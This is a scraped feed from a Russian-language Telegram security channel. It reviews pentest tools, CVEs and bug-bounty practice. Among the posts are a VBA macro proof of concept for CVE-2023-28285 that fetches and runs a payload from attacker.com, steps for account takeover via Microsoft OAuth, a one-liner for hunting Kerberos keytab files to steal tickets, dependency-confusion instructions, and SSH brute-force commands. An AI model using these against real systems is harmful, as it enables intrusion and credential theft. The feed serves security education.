Похек
16.6K subscribers
2.11K photos
110 videos
243 files
3.08K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Monitorizer

Очередной инструмент поиска поддоменов, вдохновленный subalert. Но у него есть интересная особенность. Он имеет интеграцию с nuclei, Acunetix, Slack.

Интеграция nuclei:
1. По умолчанию интеграцию уже включена, если вы хотите ё выключить, то отредактируйте файл config/default.yaml
2. Nuclei будет пересканировать все поддомены (не только найденные)

Интеграция Acunetix:
1. Вам нужно иметь запущенный Acunetix.
2. По умолчанию эта интеграция отключена, чтобы включить ее, необходимо написать @monitorizer acunetix enable в запущенный monitorizer.
3. На каждый новый найденный поддомен будет создаваться новый инстанс в Acunetix, который будет сканировать таргет.

Интеграция Slack:
report:
slack: # required
channel: CM8XXXXXX
token: BZBZBZBBZB-XXXXXXXXXX-ZZZZZZZZZZ-YYYYYYYYYYYYYY

acunetix: # optional
token: 63c19a6da79816b21429e5bb262daed863c19a6da79816b21429e5bb262daed8
host: acunetix.exmaple.com
port: 3443

settings:
nuclei:
enable: true
interval: 86400 # rescan all targets in the watch list every 24h
options: -impact high


Подготовка окружения:
sudo pip3 install -r requirements.txt

Запуск мониторинга:
python monitor.py -w watch_targets.txt

Monitorizer поддерживает более одного инструмента поиска субдоменов для поиска наибольшего количества целей:
scanners  = [
aiodnsbrute, # https://github.com/blark/aiodnsbrute (included)
subfinder, # https://github.com/subfinder/subfinder (included)
sublist3r, # https://github.com/aboul3la/Sublist3r (included)
dnsrecon, # https://github.com/darkoperator/dnsrecon (included)
dnscan, # https://github.com/rbsec/dnscan (included)
amass, # https://github.com/OWASP/Amass (included)
]


Также если вам нужно будет подключить API сторонних сервисов/инструментов сохраняйте их сюда: config/thirdparty/*

Запуск инстанса Monitorized:
screen -dmS monitorizer bash -c 'python3 monitor.py -w targets.txt'

#tools
4🔥2
reFlutter

Этот фреймворк помогает в reverse приложений Flutter, используя исправленную версию библиотеки Flutter, которая уже скомпилирована и готова к перепаковке приложений. В этой библиотеке изменен процесс десериализации снимков, что позволяет выполнять DAST в удобной форме.

Установка:
pip3 install reflutter

Автор написал очень удобный framework для реверcf Flutter приложений, поэтому использование инструмента фактически однокнопочное:
reflutter main.apk

Далее вам нужно настроить анализ трафика приложений в Burp Suite.
Также вам не нужно устанавливать ни сертификаты, ни root.
Также этот инструмент помогает обходить некоторые реализации flutter certificate pinning.

#tools
🐳3🔥2🆒2
​​WordPress BookIt <= 2.3.7 – Authentication Bypass
CVE-2023-2834

Плагин BookIt для WordPress уязвим для обхода аутентификации в версиях до 2.3.7 включительно. Это связано с недостаточной проверкой пользователя при бронировании встречи через плагин. Это позволяет злоумышленникам, не прошедшим проверку подлинности, войти в систему под именем любого существующего на сайте пользователя, например, администратора, если они знают его электронную почту.

Плагин BookIt предоставляет шорткод 'bookit' для встраивания календаря бронирования встреч в страницу на сайте WordPress. Используя эту функциональность, после выбора даты и времени в календаре можно забронировать встречу, указав имя, адрес электронной почты и пароль для регистрации.

Изучение исходного кода показывает, что плагин проверяет идентификатор пользователя на основе адреса электронной почты, указанного через параметр 'email'. Если email принадлежит существующему пользователю WordPress, он свяжет запрос с этим пользователем и установит для него аутентификационные cookies.

К сожалению, эта функциональность была реализована небезопасно, поскольку она не включает никаких проверок подлинности, таких как проверка пароля. Она просто ищет личность и разрешает это действие без надлежащей проверки и аутентификации.

Это дает возможность злоумышленникам обойти аутентификацию и получить доступ к произвольным учетным записям на сайтах с уязвимой версией плагина. Как всегда, это позволяет злоумышленникам полностью скомпрометировать уязвимый сайт WordPress и заразить атакуемый сервер.

#CVE
Forwarded from SHADOW:Group
🔐nOAUTH | Захват аккаунта через Microsoft OAuth

На сайтах, где идентификация идет по Email и есть возможность войти через Microsoft OAuth есть риск захвата аккаунта.

Дело в том, что Azure не проверяет установленную в аккаунте почту, что позволяет вам указать почту жертвы и войти на уязвимый сайт через OAUTH от ее имени.

- Жертва регается на сайте через свою почту.
- Заходим в Azure AD и меняем свою почту на почту жертвы.
- Заходим на сайт через Microsoft OAuth и получаем доступ к аккаунту жертвы.

Видео PoC

#web #ato #oauth
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from RedTeam brazzers (Миша)
Кража KeyTab.

Во время тестирования на проникновение часто встречаются системы Linux с настроенным Keytab. Keytab хранит пары принципала кербероса и его зашифрованных ключей. С помощью этих зашифрованных ключей можно получить TGT. В результате чего появляется возможность запросить TGT на имя принципала без ввода пароля. Kerberos на Linux уже далеко не редкость - гетерогенные сети становятся все более популярными по ряду причин. Например, может быть такой сценарий, что на Linux бекапится содержимое какой-либо шары, при этом получить доступ к этой шаре могут только пользователи домена. В таком случае пишется простенький скрипт на баш, в котором реализуется логика по запросу TGT тикета на основе KeyTab, а затем копирования файлов с шары. Причем для периодичности запуска скрипт добавляется в crontab.

Нам, как атакующим, конечно же, интересен процесс запроса TGT билета на основе KeyTab. Для этого можно использовать команду kinit со следующим синтаксисом:
kinit –kt <keytab> <принципал>

Например, если файл /tmp/admin.keytab служит для аутентификации пользователя admin@OFFICE.LOCAL , то делаем вот так:
kinit -kt /tmp/admin.keytab admin@OFFICE.LOCAL

Остается лишь одна проблема - обнаружение самих KeyTab файлов. Конечно, можно ручками через find искать эти файлы, потом также муторно проверять разрешения на них, что не есть хорошо. Поэтому я накалякал следующий командлет, который автоматически найдет все .keytab файлы , а затем подсветит интересные разными цветами:
1. Зеленым подсвечиваются те файлы, которые принадлежат текущему пользователю.
2. Желтым подсвечиваются те файлы, которые принадлежат пользователю, отличному от текущего, при этом текущий пользователь не имеет достаточных прав (чтение/запись) на этот самый KeyTab.
3. Наконец, красным подсвечиваются файлы, которые принадлежат пользователю, отличному от текущего, при этом текущий пользователь имеет достаточные права на этот самый KeyTab.

find / -iname '*.keytab' -type f -exec ls -l {} \; 2>/dev/null | awk -v user="$(whoami)" 'BEGIN { FS = OFS = " "; red = "\033[31m"; yellow = "\033[33m"; green = "\033[32m"; reset = "\033[0m" } { if ($3 == user && $9 ~ /.keytab$/) { printf green } else if ($3 != user && $9 ~ /.keytab$/ && $1 ~ /^-.w.r../) { printf red } else if ($3 != user && $9 ~ /.keytab$/ && ($1 !~ /^.w.r../ || $1 !~ /^-.w../)) { printf yellow } print $0; printf reset }'
👏41
Forwarded from Hack IT Easy
PEN-200-2023.pdf
49.2 MB
PEN-200-2023 💻

Наконец появилось то, что так долго ждали - обновленный курс OSCP. Мне новая методичка понравилась гораздо больше, чем предыдущая. Структурированный материал. Видна работа методологов.

Забираем и наслаждаемся.
🔥61🤝1
msLDAPDump

LDAP Enumeration Tool. msLDAPDump упрощает перечисление LDAP в домене, превращая библиотеку lpap3 из Python в простой в использовании интерфейс. Как и большинство инструментов, этот лучше всего работает под Windows. Если используется Unix, инструмент не будет определять имена хостов, которые в настоящее время недоступны через eth0.

#tools
2
Media is too big
VIEW IN TELEGRAM
Microsoft 365 MSO 2305 Build 16.0.16501.20074 Remote Code Execution
CVE-2023-28285

Сама атака осуществляется локально пользователем, имеющим аутентификацию на целевой системе. Злоумышленник может использовать уязвимость путем убеждения жертвы с помощью социальной инженерии загрузить и открыть специально созданный файл с веб-сайта, что может привести к локальной
атаку на компьютер жертвы. Злоумышленник может убедить жертву открыть вредоносную веб-страницу, используя вредоносный файл Word для Office-365 API. После того, как пользователь откроет файл, чтобы прочитать его, из API Office-365, не будучи спрошенным, что он хочет активировать, и т.д., он активирует код вредоносного сервера, который он внедрит сам, с этого вредоносного сервера. После этого клика, злоумышленник может получить конфиденциальную информацию!

PoC:
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s
http://attacker.com/CVE-2023-28285/PoC.debelui | debelui", vbNormalFocus)
End Sub

#CVE #RCE #POC #Microsoft
Cbrutekrag

Написанный на C инструмент для брутфорса SSH серверов с помощью словарей.

Сборка:
git clone --depth=1 https://github.com/matricali/cbrutekrag.git
cd cbrutekrag
make
make install

Использование:
cbrutekrag -T targets.txt -C combinations.txt -o result.log
cbrutekrag -s -t 8 -C combinations.txt -o result.log 192.168.1.0/24

#tools
7
Этим вечером хочу порекомендовать вам быстро развивающийся канал коллеги по цеху, который активно улучшает и создает контент для нашего с вами комьюнити. Многим из вас думаю понравиться его стиль и ход мыслей)

Присоединиться
🗿1
​​Firefly

Firefly - это продвинутый fuzzer, а не просто инструмент для bruteforce. Firefly дает преимущество тестирования цели с помощью большого количества встроенных тестов для обнаружения поведения цели. Firefly находится на первых стадия разработки, но работает корректно. Данный инструмент имеет огромное количество интересных преимуществ.

Установка:
go install -v github.com/Brum3ns/firefly/cmd/firefly@latest

Сборка:
git clone https://github.com/Brum3ns/firefly.git
cd firefly/
go build cmd/firefly/firefly.go
./firefly -h

Базовое использование:
firefly -h
firefly -u 'http://example.com/?query=FUZZ'

Продвинутое использование:
firefly -u 'http://example.com/?query=FUZZ' --timeout 7000
firefly -u 'http://example.com/?query=FUZZ' -m GET,POST,PUT -p https,http,ws
echo 'http://example.com/?query=FUZZ' | firefly

Поддержка GET запросов
firefly -r '
GET /?query=FUZZ HTTP/1.1
Host: example.com
User-Agent: FireFly'

Поддержка POST запросов
firefly -r '
POST /?A=1 HTTP/1.1
Host: example.com
User-Agent: Firefly
X-Host: FUZZ

B=2&C=3' -au replace

Верификация результата
firefly -u 'http://example.com/?query=FUZZ' -e

Сохранение результатов:
firefly -u 'http://example.com/?query=FUZZ' -o file.txt
firefly -u 'http://example.com/?query=FUZZ' -oJ file.json

У инструмента ещё много функций, которые мне не удалось уместить в статью, так что пользуйтесь на здоровье и читайте документацию)

#tools
4🔥4🎉2🆒1
​​🔵Firejail

Firejail - это программа-песочница SUID, которая снижает риск нарушения безопасности, ограничивая среду выполнения ненадежных приложений с использованием пространств имен Linux, seccomp-bpf и возможностей Linux. Она позволяет процессу и всем его потомкам иметь свой собственный частный вид общих ресурсов ядра, таких как сетевой стек, таблица процессов, таблица монтирования. Firejail может работать в среде SELinux или AppArmor и интегрирован с группами управления Linux.

Написанное на C с практически отсутствующими зависимостями программное обеспечение работает на любом компьютере Linux с версией ядра 3.x или новее. Оно может создавать песочницу для любого типа процессов: серверов, графических приложений и даже пользовательских сеансов входа в систему. Программное обеспечение включает профили песочницы для ряда более распространенных программ Linux, таких как Mozilla Firefox, Chromium, VLC, Transmission и т.д.

Песочница легкая, накладные расходы низкие. Нет сложных файлов конфигурации для редактирования, нет открытых соединений сокетов, нет демонов, работающих в фоновом режиме. Все функции безопасности реализованы непосредственно в ядре Linux и доступны на любом компьютере Linux.

Установка:
sudo add-apt-repository ppa:deki/firejail
sudo apt-get update
sudo apt-get install firejail firejail-profiles

Сборка:
git clone https://github.com/netblue30/firejail.git
cd firejail
./configure && make && sudo make install-strip

Запуск различных приложений:
firejail firefox            # запуск Mozilla Firefox
firejail transmission-gtk # запуск Transmission BitTorrent
firejail vlc # запуск VideoLAN Client
sudo firejail /etc/init.d/nginx start

#tools
🔥81
Атака на цепочку поставок Dependency Confusion

Привет! Году в 2019-2020 вышло исследование на тему данной атаки, она может применяется в вебе, тем самым можно получить RCE, данная атака принимается и в баг баунти
Автор этой атаки получил таким образом RCE в 35 компаний, давай разберемся в чем ее суть и как работает

🟢 Суть данной атаки в том, что нужно найти пакет, которого нет в публичном репозитории и создать пакет с точно таким же названием, сделать его вредоносным и версию выше чем прошлая и залить в публичный репозиторий, это затриггерит авто установщики и на сервер попадется твой вредоносный пакет

🟢 Пример: на сайте ты нашел файл package.json и увидел какие есть пакеты, осталось узнать какого пакета нет в публичном репозитории. После того как выявил пакет, надо создать вредоносный, с таким же названием но версией повыше, залить в публичный репозиторий и просто ждать отклик

🟠Более подробный пример эксплуатации можно глянуть тут: https://telegra.ph/RCE-cherez-Dependency-Confusion-05-11

📌 Из нюансов это атаки - отклик можно ждать от нескольких часов до недель(у кого-то даже месяцев), твой файл может подхватить разработчик компании(некоторые платформы бб это все равно принимают), твой файл может подхватить другая компания

ЧТНП | #web
Please open Telegram to view this post
VIEW IN TELEGRAM
53
🌚13🐳2🆒2
Forwarded from BI.ZONE Bug Bounty
🪲 Level up: «Тинькофф» выпускает обновление

Публичная программа «Тинькофф» на BI.ZONE Bug Bounty выходит на новый уровень.

В скоупе теперь open-source код некоторых разработок компании: OpenAPI, мобильные SDK, бэкенд-фреймворки и многое другое.

Смотрите полный список на сайте платформы — и вперед за баунти!
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3❤‍🔥2👍2🌚1
Forwarded from NETRUNNER GROUP (Tripini FKYL)
И мы снова готовы вас шокировать

❤️ Мы готовим полномасштабный проект, сериал о специалистах отдела безопасности в крупной фирме и их жизненные ситуации расказывающие об основных ошибках в безопасности компаний.

Сценарий уже почти готов, вносятся последние правки.
💀 Киллер фичей будет являться то что будут показаны реальные способы атак и их описание.
Сериал будет интересен как знающим, так и простым обывателям.

😈 Техническую поддержку нам будут обеспечивать наши любимые друзья и партнеры RESOLUTE ATTACK

Список платформ куда выйдут серии (как минимум) :
Youtube
Rutube
Dzen

P.S. Хотите фото со сьемок?)
Please open Telegram to view this post
VIEW IN TELEGRAM
👍152🥰1🌚1
Forwarded from Bounty On Coffee
Пентест или багбаунти?

Для меня, как для человека, который занимается пентестами почти 5 лет, а также 4 года багхантит, видны плюсы и минусы обоих способов защиты своих систем.

Давайте разберем их.

Для компаний, которые хотят защитить свои сервисы оба этих способа нужно держать в своем арсенале, так как являются взаимодополняемыми.

У меня есть масса примеров, которые это доказывают.

Например, очень часто бывало и бывает такое, что нам на пентест прилетает проект, который уже давно на багбаунти в котором и я участвовал. И перед проектом возникают мысли, ведь столько людей уже тестировали этот сервис, было найдено куча багов и наверняка проект будет скучным. Но нет, в 99% случаях на пентесте находится десятки багов в том числе и баги с высоким риском. Один из таких багов, буду сдавать на award.awillix.ru

Почему же так случается?

И мы не говорим сейчас о каких-либо внутренних сервисах, тестировать которые можно только на пентестах.

Чаще всего на багбаунти сервис не изучают под микроскопом, не тестируют каждый API эндпоинт детально. И поверьте мне из-за этого упускаются очень много багов.

Плюсы пентеста
Ограниченный скоуп. Это помогает фокусироваться на нужных вещах, а не бегать от одного к другому.
Команда. Относительно предоставленного скоупа мы можем выбрать на проект людей относительно их скиллов. Также командный взлом более эффективен.
Дополнительная информация. На пентестах идет плотное взаимодействие с клиентом, клиент может предоставить документацию, сваггер..., что тоже тестирование делает более эффективным
Доступ к любым сервисам в пределах скоупа. Некоторый функционал бывает немного затруднительно тестировать, например, кредиты в банках или есть хорошо настроенные вафы, которые сильно мешают. На пентестах же нам могут выдать тестовые стенды или добавить в вайтлисты для полноценного тестирование нужного функционала.

⛔️Минусы пентеста
Ограниченное время. Тут есть риск, что во время пентеста мы не можем себе позволить долго сконцентрироваться на чем-то одном. Например, если есть интересная зацепка, но раскрутить ее сходу не получается. Если это в каком-то софте, то можно отдельно поресерчить.
Ограниченное время я бы не назвал даже каким-то существенным минусом, часто это помогает нам сконцентрироваться на скоупе, которое мы исследуем во время пентеста.


Плюсы багбаунти
Огромное количество хантеров с различными скиллами. Один из самых больших плюсов багбаунти – это огромная банда хантеров с различными скиллами. Особенно это бывает полезно, если есть что-то специфическое.
Неограниченное время. Багхантер не ограничен по времени и может хоть месяц ломать то, что захочет.
Компания платит только за баг, который нашли. Для компаний хороший способ сэкономить.

⛔️Минусы багбаунти
Ограничения в действиях. Багхантер не может пробить периметр и дальше идти ломать внутрянку. Также, если мы только занимаемся багхантерством, то есть риск, что знания в постэксплуатации будут слабыми.
Отсутствие дополнительной информации.
Отсутствие доступа к некоторым сервисам. Тут тоже достаточно все очевидно, у многих ли хантеров юридические лица? Но в то же время и плюс для тех, у кого это есть, например, можно снять все сливки с юридических сервисов, если запарится и сделать себе ИП.

Учитывая все эти факторы получаем идеальную взаимодополняемость обоих способов.
6🔥4👍2
​​Active Directory глазами Impacket

При аудите Windows-инфраструктур Impacket является швейцарским ножом, позволяя активно взаимодействовать с устройствами по сети, для которых проприетарным (родным или умолчательным) инструментом, конечно же, является, PowerShell. Но так уж сложилось, что использовать последний из-под Linux – не лучшая практика, с учётом имеющихся для этого open source решений. Будучи написанным на возлюбленном в IT-сообществе Python, Impacket оставляет только положительные эмоции от использования, а также информативные и полезные результаты, а в некоторых случаях позволяет и вовсе окончить аудит, став администратором домена. Целью статьи является показать возможности рассматриваемого программного обеспечения на примере реальной сети под управлением Active Directory, и подсветить наиболее сильные его стороны. Формат статьи – обзор входящих в его состав сценариев с практическими примерами, которые в наименьшей мере заимствуется из аналогичных иностранных публикаций. Статья носит обзорный ознакомительный характер, демонстрируя возможности применения Impacket, и адаптирована особенно для тех, кто в теме информационной безопасности, знаком с Windows Server не понаслышке, и при этом рассматриваемыми скриптами толком ещё не пользовался.

#tools #AD
2🔥2🐳1
​​FVWA (Flask Vulnerable Web Application)

Мой хороший знакомый зарелизил свою лабу для тренировки веб уязвимостей. Поддержим его начинания!

Приложение содержит несколько заданий, в каждом из которых реализован некоторый изъян в безопасности (будь то слабый пароль, SQL-инъекция или XXE). Вы смело можете искать нестандартные пути решения, знакомиться с новыми для себя средствами анализа защищённости веб-приложений, пробовать различные полезные нагрузки и, главное, смотреть исходный код, позволяющий увидеть причину возникновения обнаруженной вами уязвимости.
Мы сделали минималистичную борду для сдачи флагов, а это значит, что вы сможете поделиться своими результатами с другими энтузиастами, обсудить интересные находки или поделиться способом решения)
Так что добро пожаловать в FVWA, лабораторию, где мы стараемся создать возможности для всех, кто хочет и стремится стать лучше в сфере веб-безопасности.

#тренировка
8🆒2👏1🐳1
🔥11
Information Security Memes
Photo
Аж олдскулы свело
1